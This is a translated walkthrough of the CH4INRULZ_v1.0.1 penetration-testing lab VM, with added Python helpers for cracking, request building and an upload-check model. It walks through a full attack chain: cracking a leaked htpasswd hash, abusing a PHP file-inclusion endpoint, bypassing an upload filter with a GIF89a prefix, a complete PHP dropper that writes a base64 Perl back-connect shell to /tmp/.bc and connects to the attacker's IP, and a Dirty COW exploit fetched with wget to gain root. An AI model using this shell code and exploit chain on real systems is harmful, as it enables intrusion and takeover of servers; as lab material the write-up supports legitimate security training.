CH4INRULZ_v1.0.1 internal-network penetration lab walkthrough

单调先生 2022-03-17 · 40 reads
Tags: php, debian, p2p

Full port scan with version detection and default scripts:

nmap -T4 -A -p- 192.168.206.146

Next we run dirsearch against the web server to enumerate directories:

http://192.168.206.146/development/

Then scan again with 御剑 (Yujian), which turns up a backup of the index page:

http://192.168.206.146/index.html.bak

The backup contains an Apache htpasswd entry (an $apr1$ MD5-based hash):

frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

Crack it with john and write the result to a file:

cd /root
touch password.txt
nano password.txt
  # frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
john password.txt > res.log

john --show password.txt > res.log

Cracking succeeds and gives us the account:

frank

frank!!!
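As an added example (not part of the original writeup), here is how to confirm a cracked candidate offline by recomputing the hash: Apache's $apr1$ scheme is the classic md5crypt construction with a different magic string, re-implemented below with the standard library only. The htpasswd line is the one recovered above; the wordlist is constructed for the demo.

```python
import hashlib
import hmac

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> bytes:
    """crypt(3)-style base64: emit `count` chars, low 6 bits first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def apr1_md5(password: bytes, salt: bytes, magic: bytes = b"$apr1$") -> bytes:
    """md5crypt as used by `htpasswd -m`. Pass magic=b"$1$" for Unix $1$ hashes."""
    salt = salt[:8]                                   # at most 8 salt chars are used
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    remaining = len(password)
    while remaining > 0:                              # mix in len(password) bytes of alt
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bits = len(password)
    while bits:                                       # bit-walk over the password length
        ctx.update(b"\0" if bits & 1 else password[:1])
        bits >>= 1
    final = ctx.digest()
    for i in range(1000):                             # stretching; schedule depends on i
        c = hashlib.md5()
        c.update(password if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(password)
        c.update(final if i & 1 else password)
        final = c.digest()
    order = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    encoded = b"".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                       for a, b, c in order)
    encoded += _to64(final[11], 2)
    return magic + salt + b"$" + encoded


def verify_htpasswd(line: str, candidate: str) -> bool:
    """True if `candidate` is the password behind a `user:$apr1$salt$hash` line."""
    _user, stored = line.split(":", 1)
    if not stored.startswith("$apr1$"):
        raise ValueError("only $apr1$ entries are supported here")
    _, _, salt, _ = stored.split("$")
    computed = apr1_md5(candidate.encode(), salt.encode()).decode()
    return hmac.compare_digest(computed, stored)


def crack(line: str, wordlist):
    """What john does above: return the first word that verifies, else None."""
    for word in wordlist:
        if verify_htpasswd(line, word):
            return word
    return None


HTPASSWD_LINE = "frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0"    # from index.html.bak
DEMO_WORDLIST = ["password", "frank", "frank123", "frank!!!"]   # constructed for the demo

if __name__ == "__main__":
    print(crack(HTPASSWD_LINE, DEMO_WORDLIST))  # frank!!!
```

The 1000-round loop is why md5crypt is slow enough that john needs a wordlist rather than brute force, and also why a 6-character password with a guessable base word still falls in seconds.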

With the credentials in hand, log in to the protected development area:

http://192.168.206.146/development/

Then we remember that nmap also showed an HTTP service on port 8011, so we visit that too:

http://192.168.206.146:8011

Scan this site with 御剑 as well:

http://192.168.206.146:8011/api/

Testing shows that only files_api.php responds:

http://192.168.206.146:8011/api/files_api.php

The name suggests this endpoint includes a file named by a parameter called file; we try it both as a GET and as a POST parameter.

To learn how the parameter is filtered, use the php://filter pseudo-protocol to read the script's own source (base64-encoded, so it is returned instead of executed):

http://192.168.206.146:8011/api/files_api.php?file=php://filter/read=convert.base64-encode/resource=files_api.php

As a GET parameter this only returns the HACKER DETECTED banner, as the source below shows; the same file= value has to be sent in the POST body.
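As an added example (not code from the original page), the Python below builds the POST form of that request with urllib and recovers the PHP source from the HTML that files_api.php wraps around the base64 blob. The endpoint URL is the one from the walkthrough; fake_response() is a constructed stand-in for the live server so the decoder can be run offline.

```python
import base64
import re
from urllib.parse import urlencode
from urllib.request import Request

API = "http://192.168.206.146:8011/api/files_api.php"   # endpoint from the walkthrough


def filter_wrapper(path: str) -> str:
    """php://filter wrapper that returns a file base64-encoded instead of executing it."""
    return f"php://filter/read=convert.base64-encode/resource={path}"


def build_include_request(target: str, api: str = API) -> Request:
    """The parameter goes in the POST body: files_api.php answers a GET `file`
    with the HACKER DETECTED banner but includes a POST `file` unfiltered."""
    body = urlencode({"file": target}).encode()
    return Request(api, data=body, method="POST",
                   headers={"Content-Type": "application/x-www-form-urlencoded"})


# convert.base64-encode output: one long run of base64 characters, optional padding
_B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")


def extract_source(response_body: bytes) -> bytes:
    """Pull the longest base64 run out of the surrounding HTML and decode it."""
    runs = list(_B64_RUN.finditer(response_body))
    if not runs:
        raise ValueError("no base64 blob in response (filtered, or wrong path)")
    blob = max(runs, key=lambda m: len(m.group())).group()
    return base64.b64decode(blob)


def fake_response(source: bytes) -> bytes:
    """Constructed stand-in for the server reply: the page's <head> banner plus the blob."""
    head = (b"<head>\n  <title>franks website | simple website browser API</title>\n"
            b"</head>\n\n")
    return head + base64.b64encode(source) + b"\n"


if __name__ == "__main__":
    req = build_include_request(filter_wrapper("files_api.php"))
    print(req.get_method(), req.full_url, req.data)
    # urllib.request.urlopen(req) would send it; here we decode a constructed reply instead
    demo = b"<?php\n$file = $_POST['file'];\ninclude($file);\n?>\n"
    print(extract_source(fake_response(demo)).decode())
```

Reading the source through the filter is worth doing before any include of a payload: a direct include of files_api.php or upload.php would execute them instead of revealing them, and convert.base64-encode is what turns the LFI into a source-disclosure primitive.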

The decoded source makes the logic clear: whatever arrives in the POST parameter file is passed straight to include() before any check runs, while a GET parameter only produces the HACKER DETECTED banner (the stray break outside a loop and the commented-out /etc/passwd comparison are the target's own code, left as found):

<head>
  <title>franks website | simple website browser API</title>
</head>

<?php
$file = $_POST['file'];
include($file);
$get_file = $_GET['file'];

if(isset($get_file)){

echo "<b>********* HACKER DETECTED *********</b>";
echo "<p>YOUR IP IS : ".$_SERVER['REMOTE_ADDR'];
echo "</p><p>WRONG INPUT !!</p>";
break;
}

if(!isset($file)){
echo "<p>No parameter called file passed to me</p>";
echo "<p>* Note : this API don't use json , so send the file name in raw format</p>";
}
/** else{
echo strcmp($file,"/etc/passwd");
echo strlen($file);
echo strlen("/etc/passwd");
if($file == "/etc/passwd"){
        "HACKER DETECTED ..";
        }
}**/

?>

With that understood, the next step is a file upload: give the payload a .jpg extension, set the MIME type to image/jpeg, and prepend GIF89a to the file contents so it passes the image check.

Following the hint, the uploader lives at:

http://192.168.206.146/development/uploader

After a successful upload we notice that the URL changes.

The same file inclusion lets us read the uploader's source and see exactly what it filters:

http://192.168.206.146:8011/api/files_api.php

file=php://filter/read=convert.base64-encode/resource=/var/www/development/uploader/upload.php

<?php
$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));

// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
        $uploadOk = 1;
    } else {
        echo "File is not an image.";
        $uploadOk = 0;
    }
}

// Check if file already exists
if (file_exists($target_file)) {
    echo "Sorry, file already exists.";
    $uploadOk = 0;
}

// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large.";
    $uploadOk = 0;
}

// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
    $uploadOk = 0;
}

// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?>
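As an added example (not from the original page), the Python below models the checks of upload.php above and shows both why the GIF89a trick passes them and what a stricter check would still reject. The getimagesize() stand-in, the payload and the tiny GIF are constructed for the demo and only understand GIF, which is all the bypass needs: getimagesize inspects the file bytes, the extension check inspects the file name, and nothing ever requires the two to agree.

```python
import struct

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}      # whitelist from upload.php
MAX_SIZE = 500000                                # size limit from upload.php
MIME_EXT = {"image/gif": {"gif"}}                # what the detector below can recognise


def gif_size(data: bytes):
    """Stand-in for PHP getimagesize(): accept a GIF87a/GIF89a signature and read the
    little-endian width/height that follows. Like the real function it validates only
    the header, which is exactly why a GIF89a prefix is enough."""
    if len(data) >= 10 and data[:6] in (b"GIF87a", b"GIF89a"):
        width, height = struct.unpack("<HH", data[6:10])
        return {"mime": "image/gif", "width": width, "height": height}
    return None


def extension(filename: str) -> str:
    """strtolower(pathinfo($f, PATHINFO_EXTENSION))"""
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def upload_php_check(filename: str, data: bytes, existing=frozenset()):
    """The checks of upload.php in the order they run (submit button assumed set).
    Returns (accepted, message)."""
    if gif_size(data) is None:
        return False, "File is not an image."
    if filename in existing:
        return False, "Sorry, file already exists."
    if len(data) > MAX_SIZE:
        return False, "Sorry, your file is too large."
    if extension(filename) not in ALLOWED_EXT:
        return False, "Sorry, only JPG, JPEG, PNG & GIF files are allowed."
    return True, f"The file {filename} has been uploaded to my uploads path."


def make_polyglot(php: bytes) -> bytes:
    """The walkthrough's bypass: image signature first, PHP after it. The name
    can still end in .jpg; the extension and content checks are never compared."""
    return b"GIF89a" + php


def hardened_check(filename: str, data: bytes, existing=frozenset()):
    """Same whitelist, plus: extension must match the detected type, and no PHP open
    tag anywhere in the bytes. Even then, uploads must live where PHP does not execute
    and must never reach include() via a user-supplied path, as files_api.php allows."""
    accepted, message = upload_php_check(filename, data, existing)
    if not accepted:
        return accepted, message
    detected = gif_size(data)["mime"]
    if extension(filename) not in MIME_EXT.get(detected, set()):
        return False, "Extension does not match detected image type."
    if b"<?" in data:
        return False, "PHP open tag found inside image."
    return True, "uploaded"


PHP_PAYLOAD = b"<?php system($_GET['c']); ?>"                          # constructed demo payload
TINY_GIF = b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x00" * 4 + b";"  # constructed header-only GIF

if __name__ == "__main__":
    poly = make_polyglot(PHP_PAYLOAD)
    print(upload_php_check("sqzr.jpg", poly))   # accepted by the original checks
    print(hardened_check("sqzr.jpg", poly))     # rejected: extension/type mismatch
    print(hardened_check("sqzr.gif", poly))     # rejected: PHP tag inside the image
```

The tag check is a stop-gap rather than a fix: re-encoding the image with an image library, storing it under a server-generated name outside the web root, and removing the unfiltered include() are what actually close the chain used in this walkthrough.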

This also tells us where uploaded files end up:

http://192.168.206.146/development/uploader/FRANKuploads/sqzr.jpg

Now we include the .jpg through the API; include() does not care about the extension, so the PHP inside it runs:

http://192.168.206.146:8011/api/files_api.php

file=/var/www/development/uploader/FRANKuploads/sqzr.jpg

A webshell client can now connect to it.

Because that first webshell turned out to be unsuitable, we switch to a different one: a PHP dropper that writes a Perl back-connect script to /tmp/.bc and launches it against our listener:

<?php
function which($pr) {
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}

function execute($cfe) {
    $res = '';
    if ($cfe) {
        if(function_exists('exec')) {
            @exec($cfe,$res);
            $res = join("\n",$res);
        } elseif(function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif(function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif(function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif(@is_resource($f = @popen($cfe,"r"))) {
            $res = '';
            while(!@feof($f)) {
                $res .= @fread($f,1024);
            }
            @pclose($f);
        }
    }
    return $res;
}

function cf($fname,$text){
    if($fp=@fopen($fname,'w')) {
        @fputs($fp,@base64_decode($text));
        @fclose($fp);
    }
}

$yourip = "192.168.206.128";    # change to your attacking machine's IP
$yourport = '8899';             # change to the port your listener uses
$usedb = array('perl'=>'perl','c'=>'c');

# base64 of a Perl back-connect script (#!/usr/bin/perl, use Socket; ...)
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

Upload this the same way as before (GIF89a prefix, .jpg extension), this time under the name muma.jpg.

Then start a listener on the attacking machine:

nc -lvp 8899

Then include the file through the API, which executes the dropper and gives us a shell on the listener:

http://192.168.206.146:8011/api/files_api.php

file=/var/www/development/uploader/FRANKuploads/muma.jpg

In a new Kali terminal we prepare one of the Dirty COW privilege-escalation exploits (several other exploits also work on this box; they are not covered here):

searchsploit Dirty

cp /usr/share/exploitdb/exploits/linux/local/40839.c /root/crack.c

python -m SimpleHTTPServer    # Python 2; with Python 3 use: python3 -m http.server

On the target, from the reverse shell:

cd /tmp

wget http://192.168.206.128:8000/crack.c

gcc -pthread crack.c -o crack -lcrypt

./crack 123

123 is an arbitrary password.

The exploit then creates a user firefart with password 123 by overwriting the root entry in /etc/passwd, so firefart has uid 0; it keeps a backup in /tmp/passwd.bak that should be restored afterwards.

At this point drop the nc session, reconnect, and switch to firefart with that password.
